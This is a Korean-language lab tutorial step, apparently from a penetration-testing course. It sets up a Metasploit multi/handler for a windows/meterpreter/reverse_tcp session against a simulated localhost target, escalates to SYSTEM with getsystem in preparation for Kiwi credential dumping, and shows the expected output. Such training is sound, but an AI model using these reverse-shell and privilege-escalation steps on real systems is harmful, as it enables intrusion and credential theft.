Windows 대상에서 SYSTEM 권한으로 Meterpreter 세션 확보
이 단계에서는 대상 시스템에 대한 액세스를 확보하는 것을 시뮬레이션합니다. 실제 시나리오에서는 익스플로잇을 사용하여 페이로드를 전달합니다. 여기서는 Metasploit Framework 콘솔을 사용하여 리스너를 설정합니다. 그러면 시뮬레이션된 대상이 리스너에 연결하여 Meterpreter 세션을 제공합니다.
먼저 Metasploit 콘솔을 시작합니다. -q 플래그는 배너를 표시하지 않고 조용하게 시작하도록 합니다.
msfconsole -q
다음으로 시뮬레이션된 대상으로부터 들어오는 연결을 "가로채기" 위해 리스너를 구성합니다. 이를 위해 multi/handler 모듈을 사용합니다.
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
이제 exploit -j를 사용하여 리스너를 백그라운드 작업으로 실행합니다.
exploit -j
잠시 후 세션이 생성됩니다. sessions 명령으로 활성 세션을 나열할 수 있습니다.
sessions
다음과 유사한 활성 세션을 나타내는 출력이 표시되어야 합니다.
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WIN-TARGET\LabUser @ WIN-TARGET 127.0.0.1:4444 -> 127.0.0.1:54321 (...)
이제 세션 1 과 상호 작용합니다.
sessions -i 1
프롬프트가 meterpreter >로 변경됩니다. Kiwi 를 효과적으로 사용하려면 가장 높은 수준의 권한인 NT AUTHORITY\SYSTEM이 필요합니다. getsystem 명령을 사용하여 권한을 에스컬레이션할 수 있습니다.
getsystem
...got system 메시지가 표시되어야 합니다. getuid를 실행하여 새 신원을 확인합니다.
getuid
예상되는 출력은 다음과 같아야 합니다.
Server username: NT AUTHORITY\SYSTEM
이제 SYSTEM 권한을 가진 Meterpreter 세션을 확보했으며 다음 단계를 진행할 준비가 되었습니다.